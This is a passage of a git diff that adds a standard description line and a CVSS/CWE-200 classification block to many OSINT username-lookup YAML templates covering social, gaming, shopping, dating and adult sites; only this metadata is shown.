cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-porn,contactossex self-contained: true diff --git a/osint/coroflot.yaml b/osint/coroflot.yaml index e06eb78c5e..3a0e1b9118 100644 --- a/osint/coroflot.yaml +++ b/osint/coroflot.yaml @@ -3,7 +3,12 @@ id: coroflot info: name: coroflot author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-art,coroflot self-contained: true diff --git a/osint/cowboys4angels.yaml b/osint/cowboys4angels.yaml index f14f2e9344..717d733659 100644 --- a/osint/cowboys4angels.yaml +++ b/osint/cowboys4angels.yaml @@ -3,7 +3,12 @@ id: cowboys4angels info: name: cowboys4angels author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-porn,cowboys4angels self-contained: true diff --git a/osint/cracked-io.yaml b/osint/cracked-io.yaml index 574a5a3dc1..49c6bdaa92 100644 --- a/osint/cracked-io.yaml +++ b/osint/cracked-io.yaml @@ -3,7 +3,12 @@ id: cracked-io info: name: cracked_io author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,cracked-io self-contained: true diff --git a/osint/cracked.yaml b/osint/cracked.yaml index 26ef195db1..60a063563a 100644 --- a/osint/cracked.yaml +++ b/osint/cracked.yaml @@ -3,7 +3,12 @@ id: cracked info: name: Cracked author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,cracked self-contained: true diff --git a/osint/crevado.yaml b/osint/crevado.yaml index 1e710ab355..f786ffcc49 100644 --- a/osint/crevado.yaml +++ b/osint/crevado.yaml @@ -3,7 +3,12 @@ id: crevado info: name: crevado author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-images,crevado self-contained: true diff --git a/osint/crowdin.yaml b/osint/crowdin.yaml index 0b53e25ab3..c0dd710cae 100644 --- a/osint/crowdin.yaml +++ b/osint/crowdin.yaml @@ -3,7 +3,12 @@ id: crowdin info: name: crowdin author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-hobby,crowdin self-contained: true diff --git a/osint/cults3d.yaml b/osint/cults3d.yaml index c4896a08e2..dfbdb4214a 100644 --- a/osint/cults3d.yaml +++ b/osint/cults3d.yaml @@ -3,7 +3,12 @@ id: cults3d info: name: Cults3D author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-hobby,cults3d self-contained: true diff --git a/osint/curiouscat.yaml b/osint/curiouscat.yaml index 03282148a7..b78fbb3954 100644 --- a/osint/curiouscat.yaml +++ b/osint/curiouscat.yaml @@ -3,7 +3,12 @@ id: curiouscat info: name: Curiouscat author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,curiouscat self-contained: true diff --git a/osint/cytoid.yaml b/osint/cytoid.yaml index 4629f909b5..d4fa5c99ed 100644 --- a/osint/cytoid.yaml +++ b/osint/cytoid.yaml @@ -3,7 +3,12 @@ id: cytoid info: name: Cytoid author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,cytoid self-contained: true diff --git a/osint/dailymotion.yaml b/osint/dailymotion.yaml index f58ba6e958..af4fda5d25 100644 --- a/osint/dailymotion.yaml +++ b/osint/dailymotion.yaml @@ -3,7 +3,12 @@ id: dailymotion info: name: Dailymotion author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-video,dailymotion self-contained: true diff --git a/osint/darudar.yaml b/osint/darudar.yaml index 8abecab61d..2a05c4b91c 100644 --- a/osint/darudar.yaml +++ b/osint/darudar.yaml @@ -3,7 +3,12 @@ id: darudar info: name: darudar author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-misc,darudar self-contained: true diff --git a/osint/dateinasia.yaml b/osint/dateinasia.yaml index 00eeb314fe..8ed25172b1 100644 --- a/osint/dateinasia.yaml +++ b/osint/dateinasia.yaml @@ -3,7 +3,12 @@ id: dateinasia info: name: dateinasia author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-dating,dateinasia self-contained: true diff --git a/osint/datezone.yaml b/osint/datezone.yaml index 8a49198e36..4309750be8 100644 --- a/osint/datezone.yaml +++ b/osint/datezone.yaml @@ -3,7 +3,12 @@ id: datezone info: name: datezone author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-porn,datezone self-contained: true diff --git a/osint/datingru.yaml b/osint/datingru.yaml index 6b14ac13b4..a4c77dbc0d 100644 --- a/osint/datingru.yaml +++ b/osint/datingru.yaml @@ -3,7 +3,12 @@ id: datingru info: name: Dating.ru author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-dating,datingru self-contained: true diff --git a/osint/demotywatory.yaml b/osint/demotywatory.yaml index a9af8978ea..b07fe159ec 100644 --- a/osint/demotywatory.yaml +++ b/osint/demotywatory.yaml @@ -3,7 +3,12 @@ id: demotywatory info: name: Demotywatory author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-images,demotywatory self-contained: true diff --git a/osint/depop.yaml b/osint/depop.yaml index 67fbcebf8c..a9137f6284 100644 --- a/osint/depop.yaml +++ b/osint/depop.yaml @@ -3,7 +3,12 @@ id: depop info: name: depop author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-shopping,depop self-contained: true diff --git a/osint/designspriation.yaml b/osint/designspriation.yaml index f385326c2c..29dee7be09 100644 --- a/osint/designspriation.yaml +++ b/osint/designspriation.yaml @@ -3,7 +3,12 @@ id: designspriation info: name: Designspriation author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-art,designspriation self-contained: true diff --git a/osint/destructoid.yaml b/osint/destructoid.yaml index 0524f8c2ed..3ba8f7fa34 100644 --- a/osint/destructoid.yaml +++ b/osint/destructoid.yaml @@ -3,7 +3,12 @@ id: destructoid info: name: Destructoid author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,destructoid self-contained: true diff --git a/osint/deviantart.yaml b/osint/deviantart.yaml index 92f61750d7..80d358e925 100644 --- a/osint/deviantart.yaml +++ b/osint/deviantart.yaml @@ -3,7 +3,12 @@ id: deviantart info: name: DeviantArt author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-images,deviantart self-contained: true diff --git a/osint/devrant.yaml b/osint/devrant.yaml index af857a85f6..a70b7edc96 100644 --- a/osint/devrant.yaml +++ b/osint/devrant.yaml @@ -3,7 +3,12 @@ id: devrant info: name: devRant author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-coding,devrant self-contained: true diff --git a/osint/devto.yaml b/osint/devto.yaml index ade054eaaf..b08149be85 100644 --- a/osint/devto.yaml +++ b/osint/devto.yaml @@ -3,7 +3,12 @@ id: devto info: name: dev.to author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-coding,devto self-contained: true diff --git a/osint/dfgames.yaml b/osint/dfgames.yaml index 5a2a5e3a86..afd67e1019 100644 --- a/osint/dfgames.yaml +++ b/osint/dfgames.yaml @@ -3,7 +3,12 @@ id: dfgames info: name: dfgames author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,dfgames self-contained: true diff --git a/osint/diablo.yaml b/osint/diablo.yaml index 33bec6497c..136fdfdb20 100644 --- a/osint/diablo.yaml +++ b/osint/diablo.yaml @@ -3,7 +3,12 @@ id: diablo info: name: Diablo author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,diablo self-contained: true diff --git a/osint/dibiz.yaml b/osint/dibiz.yaml index 40d53f57cf..015f0e79f0 100644 --- a/osint/dibiz.yaml +++ b/osint/dibiz.yaml @@ -3,7 +3,12 @@ id: dibiz info: name: DIBIZ author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-business,dibiz self-contained: true diff --git a/osint/digitalspy.yaml b/osint/digitalspy.yaml index c6653647a6..d2db751d3a 100644 --- a/osint/digitalspy.yaml +++ b/osint/digitalspy.yaml @@ -3,7 +3,12 @@ id: digitalspy info: name: Digitalspy author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,digitalspy self-contained: true diff --git a/osint/diigo.yaml b/osint/diigo.yaml index cc61958389..3efdabf224 100644 --- a/osint/diigo.yaml +++ b/osint/diigo.yaml @@ -3,7 +3,12 @@ id: diigo info: name: diigo author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-images,diigo self-contained: true diff --git a/osint/disabledrocks-mastodon-instance.yaml b/osint/disabledrocks-mastodon-instance.yaml index 066c93135d..49bf0e1e6e 100644 --- a/osint/disabledrocks-mastodon-instance.yaml +++ b/osint/disabledrocks-mastodon-instance.yaml @@ -3,7 +3,12 @@ id: disabledrocks-mastodon-instance info: name: Disabled.rocks (Mastodon Instance) author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,disabledrocks-mastodon-instance self-contained: true diff --git a/osint/discogs.yaml b/osint/discogs.yaml index 250a8ce1a8..6b002af53a 100644 --- a/osint/discogs.yaml +++ b/osint/discogs.yaml @@ -3,7 +3,12 @@ id: discogs info: name: Discogs author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-music,discogs self-contained: true diff --git a/osint/discourse.yaml b/osint/discourse.yaml index 4bc853712d..6d6963b34b 100644 --- a/osint/discourse.yaml +++ b/osint/discourse.yaml @@ -3,7 +3,12 @@ id: discourse info: name: Discourse author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-misc,discourse self-contained: true diff --git a/osint/discusselasticco.yaml b/osint/discusselasticco.yaml index 82998489cd..c3ff210d3e 100644 --- a/osint/discusselasticco.yaml +++ b/osint/discusselasticco.yaml @@ -3,7 +3,12 @@ id: discusselasticco info: name: discuss.elastic.co author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-tech,discusselasticco self-contained: true diff --git a/osint/discusssocial-mastodon-instance.yaml b/osint/discusssocial-mastodon-instance.yaml index a9787e42da..90ad99b3e8 100644 --- a/osint/discusssocial-mastodon-instance.yaml +++ b/osint/discusssocial-mastodon-instance.yaml @@ -3,7 +3,12 @@ id: discusssocial-mastodon-instance info: name: Discuss.social (Mastodon Instance) author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,discusssocial-mastodon-instance self-contained: true diff --git a/osint/disqus.yaml b/osint/disqus.yaml index 33d85810a1..d1a9e03aed 100644 --- a/osint/disqus.yaml +++ b/osint/disqus.yaml @@ -3,7 +3,12 @@ id: disqus info: name: Disqus author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,disqus self-contained: true diff --git a/osint/dissenter.yaml b/osint/dissenter.yaml index 84af847fbd..8128e09300 100644 --- a/osint/dissenter.yaml +++ b/osint/dissenter.yaml @@ -3,7 +3,12 @@ id: dissenter info: name: Dissenter author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-political,dissenter self-contained: true diff --git a/osint/dockerhub.yaml b/osint/dockerhub.yaml index bf7536214a..2055a114e7 100644 --- a/osint/dockerhub.yaml +++ b/osint/dockerhub.yaml @@ -3,7 +3,12 @@ id: dockerhub info: name: DockerHub author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-coding,dockerhub self-contained: true diff --git a/osint/dojoverse.yaml b/osint/dojoverse.yaml index b1490ca6d3..7d664d2359 100644 --- a/osint/dojoverse.yaml +++ b/osint/dojoverse.yaml @@ -3,7 +3,12 @@ id: dojoverse info: name: Dojoverse author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-hobby,dojoverse self-contained: true diff --git a/osint/donation-alerts.yaml b/osint/donation-alerts.yaml index b58a317543..2dd4c3ae84 100644 --- a/osint/donation-alerts.yaml +++ b/osint/donation-alerts.yaml @@ -3,7 +3,12 @@ id: donation-alerts info: name: Donation Alerts author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-business,donation-alerts self-contained: true diff --git a/osint/dotcards.yaml b/osint/dotcards.yaml index 7c0ea7e9bb..58ad97edad 100644 --- a/osint/dotcards.yaml +++ b/osint/dotcards.yaml @@ -3,7 +3,12 @@ id: dotcards info: name: dot.cards author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-business,dotcards self-contained: true diff --git a/osint/dribbble.yaml b/osint/dribbble.yaml index d70a84ed01..ddc27e2aad 100644 --- a/osint/dribbble.yaml +++ b/osint/dribbble.yaml @@ -3,7 +3,12 @@ id: dribbble info: name: Dribbble author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-art,dribbble self-contained: true diff --git a/osint/droners.yaml b/osint/droners.yaml index 95de2b42e1..7338d9a840 100644 --- a/osint/droners.yaml +++ b/osint/droners.yaml @@ -3,7 +3,12 @@ id: droners info: name: Droners author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-hobby,droners self-contained: true diff --git a/osint/drum.yaml b/osint/drum.yaml index 5ff96004c1..9059f8be11 100644 --- a/osint/drum.yaml +++ b/osint/drum.yaml @@ -3,7 +3,12 @@ id: drum info: name: Drum author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-hobby,drum self-contained: true diff --git a/osint/duolingo.yaml b/osint/duolingo.yaml index 4013972a5f..1da54663fd 100644 --- a/osint/duolingo.yaml +++ b/osint/duolingo.yaml @@ -3,7 +3,12 @@ id: duolingo info: name: Duolingo author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-hobby,duolingo self-contained: true diff --git a/osint/easyen.yaml b/osint/easyen.yaml index 66e6671624..f96872d7b5 100644 --- a/osint/easyen.yaml +++ b/osint/easyen.yaml @@ -3,7 +3,12 @@ id: easyen info: name: easyen author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,easyen self-contained: true diff --git a/osint/ebay-stores.yaml b/osint/ebay-stores.yaml index a7520c7fe6..2b735f1c81 100644 --- a/osint/ebay-stores.yaml +++ b/osint/ebay-stores.yaml @@ -3,7 +3,12 @@ id: ebay-stores info: name: ebay_stores author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-shopping,ebay-stores self-contained: true diff --git a/osint/ebay.yaml b/osint/ebay.yaml index 6ceff88042..6bca4e6b07 100644 --- a/osint/ebay.yaml +++ b/osint/ebay.yaml @@ -3,7 +3,12 @@ id: ebay info: name: eBay author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-shopping,ebay self-contained: true diff --git a/osint/elloco.yaml b/osint/elloco.yaml index d3de9093f5..a8e758dc2d 100644 --- a/osint/elloco.yaml +++ b/osint/elloco.yaml @@ -3,7 +3,12 @@ id: elloco info: name: Ello.co author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-art,elloco self-contained: true diff --git a/osint/engadget.yaml b/osint/engadget.yaml index 878b17b099..e0436ab63a 100644 --- a/osint/engadget.yaml +++ b/osint/engadget.yaml @@ -3,7 +3,12 @@ id: engadget info: name: Engadget author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-tech,engadget self-contained: true diff --git a/osint/eporner.yaml b/osint/eporner.yaml index c637bf7011..387b5da16c 100644 --- a/osint/eporner.yaml +++ b/osint/eporner.yaml @@ -3,7 +3,12 @@ id: eporner info: name: EPORNER author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-porn,eporner self-contained: true diff --git a/osint/etoro.yaml b/osint/etoro.yaml index caf7c913a1..b23748cc04 100644 --- a/osint/etoro.yaml +++ b/osint/etoro.yaml @@ -3,7 +3,12 @@ id: etoro info: name: eToro author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-finance,etoro self-contained: true diff --git a/osint/etsy.yaml b/osint/etsy.yaml index 3534cabccb..ed499ef56f 100644 --- a/osint/etsy.yaml +++ b/osint/etsy.yaml @@ -3,7 +3,12 @@ id: etsy info: name: Etsy author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-shopping,etsy self-contained: true diff --git a/osint/expressionalsocial-mastodon-instance.yaml b/osint/expressionalsocial-mastodon-instance.yaml index 0601423dd3..37fa2eee17 100644 --- a/osint/expressionalsocial-mastodon-instance.yaml +++ b/osint/expressionalsocial-mastodon-instance.yaml @@ -3,7 +3,12 @@ id: expressionalsocial-mastodon-instance info: name: Expressional.social (Mastodon Instance) author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,expressionalsocial-mastodon-instance self-contained: true diff --git a/osint/extralunchmoney.yaml b/osint/extralunchmoney.yaml index a512fc0f0c..c6d8cbb602 100644 --- a/osint/extralunchmoney.yaml +++ b/osint/extralunchmoney.yaml @@ -3,7 +3,12 @@ id: extralunchmoney info: name: ExtraLunchMoney author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-porn,extralunchmoney self-contained: true diff --git a/osint/eyeem.yaml b/osint/eyeem.yaml index c05433c675..d540ce9343 100644 --- a/osint/eyeem.yaml +++ b/osint/eyeem.yaml @@ -3,7 +3,12 @@ id: eyeem info: name: Eyeem author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-art,eyeem self-contained: true diff --git a/osint/f3.yaml b/osint/f3.yaml index deef962491..0735c67c8b 100644 --- a/osint/f3.yaml +++ b/osint/f3.yaml @@ -3,7 +3,12 @@ id: f3 info: name: F3 author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,f3 self-contained: true diff --git a/osint/fabswingers.yaml b/osint/fabswingers.yaml index 17f4b21116..fdf6a0d01a 100644 --- a/osint/fabswingers.yaml +++ b/osint/fabswingers.yaml @@ -3,7 +3,12 @@ id: fabswingers info: name: Fabswingers author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-dating,fabswingers self-contained: true diff --git a/osint/faktopedia.yaml b/osint/faktopedia.yaml index e18d5a8404..e242679f7a 100644 --- a/osint/faktopedia.yaml +++ b/osint/faktopedia.yaml @@ -3,7 +3,12 @@ id: faktopedia info: name: Faktopedia author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-images,faktopedia self-contained: true diff --git a/osint/fancentro.yaml b/osint/fancentro.yaml index 542e2307f1..f38dc0408c 100644 --- a/osint/fancentro.yaml +++ b/osint/fancentro.yaml @@ -3,7 +3,12 @@ id: fancentro info: name: FanCentro author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-porn,fancentro self-contained: true diff --git a/osint/fandalism.yaml b/osint/fandalism.yaml index 3e59ee89c9..309ba1384e 100644 --- a/osint/fandalism.yaml +++ b/osint/fandalism.yaml @@ -3,7 +3,12 @@ id: fandalism info: name: fandalism author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-hobby,fandalism self-contained: true diff --git a/osint/fandom.yaml b/osint/fandom.yaml index 638facb3f1..63b164ae88 100644 --- a/osint/fandom.yaml +++ b/osint/fandom.yaml @@ -3,7 +3,12 @@ id: fandom info: name: Fandom author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,fandom self-contained: true diff --git a/osint/fanpop.yaml b/osint/fanpop.yaml index 0c1b073331..f301ec4663 100644 --- a/osint/fanpop.yaml +++ b/osint/fanpop.yaml @@ -3,7 +3,12 @@ id: fanpop info: name: fanpop author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,fanpop self-contained: true diff --git a/osint/fansly.yaml b/osint/fansly.yaml index 276fba15e8..e1f42a3470 100644 --- a/osint/fansly.yaml +++ b/osint/fansly.yaml @@ -3,7 +3,12 @@ id: fansly info: name: fansly author: dwisiswant0 + description: This 